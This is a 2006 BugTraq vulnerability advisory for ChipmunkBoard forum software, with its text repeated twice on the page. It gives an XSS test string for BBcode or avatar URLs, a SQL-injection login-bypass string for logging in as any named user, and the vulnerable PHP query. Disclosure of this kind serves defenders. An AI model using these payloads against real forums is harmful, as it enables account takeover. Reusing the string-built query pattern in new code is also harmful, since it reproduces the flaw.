BugTraq
Back to list
|
Post reply
ChipmunkBoard Multiple Attack vectors
May 06 2006 12:54PM
zerogue gmail com
ChipmunkBoard Multiple Attack vectors
Discovered by: Nomenumbra
Date: 6/4/2006
impact:high (privilege escalation,possible defacement)
It is possible to insert the following javascript in the BBcode or supply it as your avatar url:
javascript:alert(%27xss%27);
Also ChipmunkBoard is prone to SQL-injection, provided magic_quotes is turned off.
SQL injection is as follows (quite odd), replace whateveruser with the username you want to log in as:
a' or ('1' = '1' AND username = 'whateveruser') or '2' = '2
The vulnerable code lies in:
$query = "select * from b_users where username='$username' and password='$password' and validated='1'";
Nomenumbra/[0x4F4C]
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Discovered by: Nomenumbra
Date: 6/4/2006
impact:high (privilege escalation,possible defacement)
It is possible to insert the following javascript in the BBcode or supply it as your avatar url:
javascript:alert(%27xss%27);
Also ChipmunkBoard is prone to SQL-injection, provided magic_quotes is turned off.
SQL injection is as follows (quite odd), replace whateveruser with the username you want to log in as:
a' or ('1' = '1' AND username = 'whateveruser') or '2' = '2
The vulnerable code lies in:
$query = "select * from b_users where username='$username' and password='$password' and validated='1'";
Nomenumbra/[0x4F4C]
[ reply ]